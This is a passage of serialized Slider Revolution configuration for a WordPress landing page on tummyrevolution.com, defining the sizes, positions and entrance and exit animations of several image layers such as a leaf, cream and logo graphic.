:true},\"m\":{\"v\":\"121px\",\"e\":true}},\"y\":{\"d\":{\"e\":true},\"n\":{\"v\":\"-107px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":8,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":8,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":820},{\"id\":\"frame_999\",\"start\":3500}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-50px\"},\"n\":{\"v\":\"-50px\"},\"t\":{\"v\":\"-50px\"},\"m\":{\"v\":\"-50px\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":700,\"start\":820,\"startRelative\":820},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":700,\"start\":820,\"startRelative\":820},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":900,\"start\":3500,\"startRelative\":1980,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"6\":{\"text\":\"Image 5\",\"alias\":\"Cvekla\",\"uid\":6,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/landing-slide1-graphic51.png\",\"imageId\":4596},\"size\":{\"width\":{\"d\":{\"v\":\"409px\",\"e\":true},\"n\":{\"v\":\"395px\",\"e\":true},\"t\":{\"v\":\"205px\",\"e\":true},\"m\":{\"v\":\"96px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"98px\",\"e\":true},\"n\":{\"v\":\"95px\",\"e\":true},\"t\":{\"v\":\"49px\",\"e\":true},\"m\":{\"v\":\"23px\",\"e\":true}},\"originalWidth\":409,\"originalHeight\":98,\"aspectRatio\":{\"d\":{\"v\":4.173469387755102},\"n\":{\"v\":4.173469387755102},\"t\":{\"v\":4.173469387755102},\"m\":{\"v\":4.173469387755102}}},\"position\":{\"x\":{\"d\":{\"v\":\"1091px\",\"e\":true},\"n\":{\"v\":\"344px\",\"e\":true},\"t\":{\"v\":\"575px\",\"e\":true},\"m\":{\"v\":\"345px\",\"e\":true}},\"y\":{\"d\":{\"e\":true},\"n\":{\"v\":\"-145px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"horizontal\":{\"d\":{\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":9,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":9,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":920},{\"id\":\"frame_999\",\"start\":3500}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"-100%\"},\"n\":{\"v\":\"-100%\"},\"t\":{\"v\":\"-100%\"},\"m\":{\"v\":\"-100%\"}},\"z\":\"0\",\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":\"0deg\",\"rotationY\":\"0\",\"rotationZ\":\"0\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true,\"x\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}},\"y\":{\"d\":{\"v\":\"0px\"},\"n\":{\"v\":\"0px\"},\"t\":{\"v\":\"0px\"},\"m\":{\"v\":\"0px\"}}},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":920,\"startRelative\":920},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"mask\":{\"use\":true},\"timeline\":{\"speed\":1500,\"start\":920,\"startRelative\":920},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":900,\"start\":3500,\"startRelative\":1080,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"7\":{\"text\":\"Image 6\",\"alias\":\"Leaf\",\"uid\":7,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/landing-slide1-graphic71.png\",\"imageId\":4597},\"size\":{\"width\":{\"d\":{\"v\":\"516px\",\"e\":true},\"n\":{\"v\":\"299px\",\"e\":true},\"t\":{\"v\":\"277px\",\"e\":true},\"m\":{\"v\":\"113px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"305px\",\"e\":true},\"n\":{\"v\":\"177px\",\"e\":true},\"t\":{\"v\":\"164px\",\"e\":true},\"m\":{\"v\":\"67px\",\"e\":true}},\"originalWidth\":516,\"originalHeight\":305,\"aspectRatio\":{\"d\":{\"v\":1.6918032786885246},\"n\":{\"v\":1.6918032786885246},\"t\":{\"v\":1.6918032786885246},\"m\":{\"v\":1.6918032786885246}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"n\":{\"v\":\"527px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"57px\",\"e\":true},\"n\":{\"v\":\"40px\",\"e\":true},\"t\":{\"v\":\"295px\",\"e\":true},\"m\":{\"v\":\"206px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"right\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":10,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":10,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":700},{\"id\":\"frame_999\",\"start\":3500}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":900,\"start\":700,\"startRelative\":700},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":900,\"start\":700,\"startRelative\":700},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":3500,\"startRelative\":1900,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"8\":{\"text\":\"Image 7\",\"alias\":\"Cream\",\"uid\":8,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/landing-slide1-graphic61.png\",\"imageId\":4598},\"size\":{\"width\":{\"d\":{\"v\":\"362px\",\"e\":true},\"n\":{\"v\":\"217px\",\"e\":true},\"t\":{\"v\":\"159px\",\"e\":true},\"m\":{\"v\":\"159px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"205px\",\"e\":true},\"n\":{\"v\":\"123px\",\"e\":true},\"t\":{\"v\":\"90px\",\"e\":true},\"m\":{\"v\":\"90px\",\"e\":true}},\"originalWidth\":362,\"originalHeight\":205,\"aspectRatio\":{\"d\":{\"v\":1.7658536585365854},\"n\":{\"v\":1.7658536585365854},\"t\":{\"v\":1.7658536585365854},\"m\":{\"v\":1.7658536585365854}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"n\":{\"v\":\"559px\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"y\":{\"d\":{\"v\":\"185px\",\"e\":true},\"n\":{\"v\":\"86px\",\"e\":true},\"t\":{\"v\":\"358px\",\"e\":true},\"m\":{\"v\":\"358px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"right\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"zIndex\":11,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":11,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":800},{\"id\":\"frame_999\",\"start\":3500}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":900,\"start\":800,\"startRelative\":800},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":900,\"start\":800,\"startRelative\":800},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":900,\"start\":3500,\"startRelative\":1800,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\",\"version\":\"6.6.0\"},\"9\":{\"text\":\"Image 8\",\"alias\":\"Logo\",\"uid\":9,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/revslider\\/landing-slide1-graphic81.png\",\"imageId\":4599},\"size\":{\"width\":{\"d\":{\"v\":\"850px\",\"e\":true},\"n\":{\"v\":\"725px\",\"e\":true},\"t\":{\"v\":\"464px\",\"e\":true},\"m\":{\"v\":\"464px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"150px\",\"e\":true},\"n\":{\"v\":\"128px\",\"e\":true},\"t\":{\"v\":\"82px\",\"e\":true},\"m\":{\"v\":\"82px\",\"e\":true}},\"originalWidth\":850,\"originalHeight\":150,\"aspectRatio\":{\"d\":{\"v\":5.666666666666667},\"n\":{\"v\":5.666666666666667},\"t\":{\"v\":5.666666666666667},\"m\":{\"v\":5.666666666666667}}},\"position\":{\"x\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"v\":\"10px\",\"e\":true},\"m\":{\"v\":\"5px\",\"e\":true}},\"y\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"v\":\"-90px\",\"e\":true},\"m\":{\"v\":\"-35px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":12,\"position\":\"absolute\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":12,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":10},{\"id\":\"frame_999\",\"start\":3500}],\"frames\":{\"frame_0\":{\"alias\":\"Anim 